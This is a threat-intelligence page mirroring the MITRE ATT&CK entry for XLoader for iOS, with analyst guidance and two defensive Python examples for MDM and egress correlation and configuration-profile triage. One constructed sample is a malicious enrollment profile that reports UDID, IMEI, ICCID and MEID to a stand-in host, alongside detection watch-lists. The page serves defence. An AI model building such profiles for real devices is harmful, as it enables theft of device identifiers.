
S0490: XLoader for iOS

XLoader for iOS is a malicious iOS application that is capable of gathering system information.[1] It is tracked separately from the XLoader for Android.

Domain: Mobile · ID: S0490 · Type: Malware · Object version: 1.1
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

XLoader for iOS matters because it represents malicious mobile software focused on discovering device and network details, with related behavior that includes modifying code-signing policy and exfiltrating data over a command-and-control channel. For leaders, the practical issue is not just one named malware family; it is whether managed iOS devices can be trusted to enforce app integrity, report suspicious profiles or signing changes, and provide enough telemetry for responders to understand what information may have been exposed.

Executive priority

Treat this as a mobile security and incident-readiness validation item for iOS environments. Key leadership questions are: are iOS devices enrolled and governed consistently, can the organization prove app/profile integrity controls are enforced, and can the SOC or IR team reconstruct device discovery and outbound communication activity if a malicious app is suspected? This is especially relevant where mobile devices access corporate identity, email, collaboration, or regulated data.

Technical view

ATT&CK lists XLoader for iOS as iOS malware capable of gathering system information and relates it to System Network Configuration Discovery, System Information Discovery, Code Signing Policy Modification, and Exfiltration Over C2 Channel. Because ATT&CK provides no official detection text for this object, defenders should validate coverage around the related techniques: collection of OS/hardware/network attributes, abnormal application or profile trust changes, and outbound communications that may carry data over the same channel used for command and control. Focus validation on iOS mobile device management, app inventory, configuration/profile state, and network egress visibility rather than assuming endpoint-style telemetry is available.

Likely telemetry

  • Mobile device management enrollment, compliance, configuration, and profile state
  • iOS application inventory and installation history
  • Code-signing, developer trust, or profile-related change evidence where available
  • Device OS version, hardware model, patch, and configuration attributes collected by management tools
  • Network metadata for mobile device egress, including destination, timing, volume, and protocol where available

Detection direction

  • Map current detections to the related ATT&CK techniques T1422, T1426, T1632.001, and T1646 rather than relying on the malware name alone.
  • Validate whether iOS telemetry can reveal suspicious profile or code-signing policy changes; this is a common blind spot if devices are unmanaged or only lightly managed.
  • Baseline expected mobile app inventory and network destinations so anomalous outbound communications from iOS devices can be reviewed with fewer false positives.
  • Correlate mobile management data with network logs; either source alone may not prove discovery or exfiltration behavior.
  • Account for legitimate system inventory collection by MDM tools when tuning detections for system and network information discovery.
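As an added worked example (not code from Glexia, MITRE, or the cited Trend Micro report), the Python below sketches the correlation the bullets above call for: an MDM profile-event feed, an MDM app-inventory snapshot, and a proxy or VPN egress log are joined on a device identifier, and a device is raised only when at least two independent sources agree, with legitimate MDM inventory collection and baseline destinations excluded up front. The record schemas, field names, approved-app and baseline-destination sets, and every sample record are constructed for the example and are not any vendor's format.

```python
"""Correlate iOS MDM telemetry with network egress to surface a device whose
behaviour lines up with the ATT&CK relationships for S0490: a trust change
(T1632.001), an app outside the approved inventory, and outbound requests to
a non-baseline destination (T1646).

Added example. The schemas, field names, baselines and every record below are
constructed for illustration and are not any MDM or proxy vendor's format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# --- Organisation baselines (constructed) ---
APPROVED_PROFILE_SIGNERS = {"Corp MDM Signing CA"}
APPROVED_APPS = {"com.apple.mobilemail", "com.example.corp-auth", "com.example.chat"}
BASELINE_EGRESS = {"mail.example.com", "sso.example.com", "mdm.example.com"}

# --- Sample telemetry (constructed) ---
PROFILE_EVENTS = [
    {"device": "ios-001", "ts": "2024-05-01T09:00:00", "profile": "Corp Wi-Fi", "signer": "Corp MDM Signing CA"},
    {"device": "ios-002", "ts": "2024-05-01T10:05:00", "profile": "Free Storage Upgrade", "signer": None},
]
APP_INVENTORY = {
    "ios-001": {"com.apple.mobilemail", "com.example.corp-auth"},
    "ios-002": {"com.apple.mobilemail", "com.example.corp-auth", "net.unknown.cleaner"},
    "ios-003": {"com.apple.mobilemail"},
}
EGRESS = [
    {"device": "ios-001", "ts": "2024-05-01T09:30:00", "dst": "mail.example.com", "method": "POST", "bytes_out": 4800},
    {"device": "ios-002", "ts": "2024-05-01T10:07:00", "dst": "203.0.113.44", "method": "POST", "bytes_out": 2100},
    {"device": "ios-002", "ts": "2024-05-01T10:07:30", "dst": "203.0.113.44", "method": "POST", "bytes_out": 650},
    {"device": "ios-003", "ts": "2024-05-01T11:00:00", "dst": "cdn.example.net", "method": "GET", "bytes_out": 300},
]


def _t(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp)


def correlate(profile_events, app_inventory, egress, window=timedelta(hours=24)):
    """Return {device: [indicator text, ...]} for devices with indicators from at
    least two different sources. MDM data or network logs alone rarely prove
    discovery or exfiltration; the join is what makes the finding reviewable."""
    indicators = defaultdict(list)   # device -> [(source, text)]
    trust_change_at = {}             # device -> time of first untrusted profile

    # Source 1 (MDM profile feed): a profile from a signer outside the approved set.
    # signer=None models an unsigned profile.
    for ev in profile_events:
        if ev["signer"] not in APPROVED_PROFILE_SIGNERS:
            indicators[ev["device"]].append(
                ("mdm_profile", f"profile outside trusted signers: {ev['profile']!r} (signer={ev['signer']})"))
            trust_change_at.setdefault(ev["device"], _t(ev["ts"]))

    # Source 2 (MDM app inventory): bundle IDs outside the approved inventory.
    for dev, apps in app_inventory.items():
        for app in sorted(apps - APPROVED_APPS):
            indicators[dev].append(("mdm_apps", f"app outside approved inventory: {app}"))

    # Source 3 (proxy/VPN egress): requests to non-baseline destinations, aggregated
    # per device and destination so volume is visible, and tagged when they fall
    # inside the review window after a trust change on the same device.
    summary = defaultdict(lambda: {"requests": 0, "bytes_out": 0, "after_trust_change": False})
    for rec in egress:
        if rec["dst"] in BASELINE_EGRESS:
            continue
        s = summary[(rec["device"], rec["dst"])]
        s["requests"] += 1
        s["bytes_out"] += rec["bytes_out"]
        t0 = trust_change_at.get(rec["device"])
        if t0 is not None and t0 <= _t(rec["ts"]) <= t0 + window:
            s["after_trust_change"] = True
    for (dev, dst), s in summary.items():
        tag = ", within review window after trust change" if s["after_trust_change"] else ""
        indicators[dev].append(
            ("egress", f"egress outside baseline: {dst} ({s['requests']} requests, {s['bytes_out']} bytes out{tag})"))

    # Require two different sources before raising the device for review.
    return {dev: [text for _, text in inds]
            for dev, inds in indicators.items()
            if len({src for src, _ in inds}) >= 2}


if __name__ == "__main__":
    for dev, inds in correlate(PROFILE_EVENTS, APP_INVENTORY, EGRESS).items():
        print(dev)
        for line in inds:
            print("  -", line)
```

On the constructed data only ios-002 is raised: its unsigned profile, the unknown bundle ID and two POSTs to 203.0.113.44 (2750 bytes) all land together, while ios-003's single unfamiliar destination stays below the two-source bar. The two-source rule is the point of the bullets above; raise or lower it per environment, and feed approved signers and bundle IDs from the MDM rather than hard-coding them as here.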

Mitigation priorities

  • Prioritize consistent iOS device enrollment and compliance enforcement for devices accessing business services.
  • Maintain controls that restrict untrusted applications, profiles, and signing-policy changes where the environment supports them.
  • Ensure mobile network traffic from managed devices is visible through approved VPN, proxy, DNS, or secure access paths where feasible.
  • Define an IR playbook for suspected malicious mobile applications that includes device isolation, app/profile review, credential risk review, and evidence preservation.
  • Use the ATT&CK relationships as control-test scenarios for mobile security, identity access reviews, and compliance evidence collection.

Analyst notes and limits

The official ATT&CK entry is sparse: it identifies XLoader for iOS as malicious iOS software capable of gathering system information and distinguishes it from XLoader for Android. The strongest defensive value comes from the provided relationships to discovery, code-signing policy modification, and exfiltration over C2 channel. The cited external reporting is Trend Micro’s 2019 analysis of XLoader/FakeSpy links.

ATT&CK provides no official detection guidance, no aliases, and no tactics for this object in the supplied fields. This take does not assert current activity, attribution, impact, or detection coverage. Local iOS management architecture, logging depth, and network routing determine what can actually be detected or proven during an incident.

Official MITRE ATT&CK definition

XLoader for iOS

XLoader for iOS is a malicious iOS application that is capable of gathering system information.[1] It is tracked separately from the XLoader for Android.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

4 rows

Domain | ID | Name | Relationship / procedure

Mobile | T1426 | System Information Discovery
XLoader for iOS can obtain the device’s UDID, version number, and product number. [1]

Mobile | T1422 | System Network Configuration Discovery
XLoader for iOS can obtain the device’s IMEI, ICCID, and MEID. [1]

Mobile | T1632.001 | Code Signing Policy Modification (sub-technique)
XLoader for iOS has been installed via a malicious configuration profile. [1]

Mobile | T1646 | Exfiltration Over C2 Channel
XLoader for iOS has exfiltrated data using HTTP requests. [1]
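The T1632.001 row says only that XLoader for iOS was installed via a malicious configuration profile. As an added example (not code from this page, MITRE, or the Trend Micro report), the Python below shows a triage check a responder can run on a recovered .mobileconfig file: it reads the plist, records whether the file was CMS-signed at all, and flags payload types that change device trust or management. It assumes Apple's documented over-the-air profile delivery format, in which a "Profile Service" payload lists DeviceAttributes that the device reports to the payload URL on install; whether XLoader's profile used that exact payload type is an assumption, since the page does not say. The sample profiles, hostnames, identifiers and the small watch-list of sensitive payload types are constructed for the example.

```python
"""Triage a recovered iOS configuration profile (.mobileconfig).

Added example; assumes Apple's plist-based profile format. The sample profiles,
hostnames and identifiers below are constructed, not observed artefacts.
"""
import plistlib
from urllib.parse import urlparse

# Attributes an OTA "Profile Service" payload can ask the device to report; these
# are the hardware identifiers a malicious profile would want (assumed list).
IDENTIFIER_ATTRIBUTES = {"UDID", "IMEI", "ICCID", "MEID"}

# Payload types that change trust or management state (assumed watch-list).
SENSITIVE_PAYLOAD_TYPES = {
    "com.apple.mdm": "grants a server ongoing MDM control",
    "com.apple.security.root": "installs a trusted root certificate",
    "com.apple.vpn.managed": "routes traffic through a configured VPN",
    "com.apple.webClip.managed": "adds a home-screen web clip that can pass as an app",
}


def is_cms_signed(raw: bytes) -> bool:
    """A signed .mobileconfig is a DER CMS/PKCS#7 blob whose first byte is the
    ASN.1 SEQUENCE tag 0x30; an unsigned profile is a bare XML plist."""
    return raw[:1] == b"\x30"


def inspect_profile(raw: bytes) -> dict:
    """Return a triage report for an unsigned profile. For a signed one, strip the
    CMS envelope first (e.g. openssl smime -verify -noverify -inform DER) and
    record the signer separately; a signature alone does not make it trusted."""
    if is_cms_signed(raw):
        raise ValueError("CMS-signed profile: extract the inner plist before inspecting")
    top = plistlib.loads(raw)
    report = {
        "name": top.get("PayloadDisplayName"),
        "identifier": top.get("PayloadIdentifier"),
        "type": top.get("PayloadType"),
        "signed": False,
        "findings": ["profile is unsigned (bare XML plist)"],
    }
    if top.get("PayloadType") == "Profile Service":
        # OTA enrollment: the device reports the listed attributes to URL, so
        # hardware identifiers here mean discovery happens at install time.
        content = top.get("PayloadContent", {})
        attrs = set(content.get("DeviceAttributes", []))
        host = urlparse(content.get("URL", "")).hostname
        report["findings"].append(
            f"Profile Service enrollment reports {', '.join(sorted(attrs))} to host {host}")
        ids = sorted(attrs & IDENTIFIER_ATTRIBUTES)
        if ids:
            report["findings"].append(f"requests hardware identifiers: {', '.join(ids)}")
        payloads = []
    else:
        # Ordinary configuration profile: PayloadContent is a list of payload dicts.
        payloads = top.get("PayloadContent", [])
    for payload in payloads:
        ptype = payload.get("PayloadType")
        if ptype in SENSITIVE_PAYLOAD_TYPES:
            report["findings"].append(f"{ptype}: {SENSITIVE_PAYLOAD_TYPES[ptype]}")
    return report


# Constructed sample 1: an OTA enrollment profile pointing at an unfamiliar host.
SAMPLE_OTA_PROFILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>PayloadType</key><string>Profile Service</string>
  <key>PayloadVersion</key><integer>1</integer>
  <key>PayloadIdentifier</key><string>com.example-unknown.enroll</string>
  <key>PayloadDisplayName</key><string>Free Storage Upgrade</string>
  <key>PayloadContent</key><dict>
    <key>URL</key><string>https://203.0.113.44/enroll</string>
    <key>Challenge</key><string>c0ffee</string>
    <key>DeviceAttributes</key><array>
      <string>UDID</string><string>IMEI</string><string>ICCID</string>
      <string>VERSION</string><string>PRODUCT</string><string>MEID</string>
    </array>
  </dict>
</dict></plist>
"""

# Constructed sample 2: a corporate-looking profile that also drops a root CA.
SAMPLE_CONFIG_PROFILE = plistlib.dumps({
    "PayloadType": "Configuration", "PayloadVersion": 1,
    "PayloadIdentifier": "com.example.corp.wifi", "PayloadDisplayName": "Corp Wi-Fi",
    "PayloadContent": [
        {"PayloadType": "com.apple.wifi.managed", "PayloadIdentifier": "com.example.corp.wifi.1", "SSID_STR": "corp"},
        {"PayloadType": "com.apple.security.root", "PayloadIdentifier": "com.example.corp.ca", "PayloadContent": b"..."},
    ],
})

if __name__ == "__main__":
    for sample in (SAMPLE_OTA_PROFILE, SAMPLE_CONFIG_PROFILE):
        r = inspect_profile(sample)
        print(r["name"], r["identifier"], r["type"])
        for finding in r["findings"]:
            print("  -", finding)
```

The first sample is flagged for reporting UDID, IMEI, ICCID and MEID (the same identifiers the T1426 and T1422 rows list) to 203.0.113.44; the second is flagged only for its root-certificate payload, which is the kind of trust change the T1632.001 row points at. Pair the output with the MDM's record of which profiles it actually pushed, since an unsigned profile and a profile the MDM never issued are the two findings that matter most.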

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.1
Created: (not supplied)
Modified: (not supplied)
Raw hash: dd18436cff33ad04...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | (not supplied) | 1.1 | (not supplied) | Current bundle | dd18436cff33…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] TrendMicro-XLoader-FakeSpy. Hiroaki, H., Wu, L., Wu, L. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Trend Micro. Retrieved July 20, 2020.
  2. [2] mitre-attack S0490. MITRE ATT&CK software entry S0490, XLoader for iOS (attack.mitre.org).

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.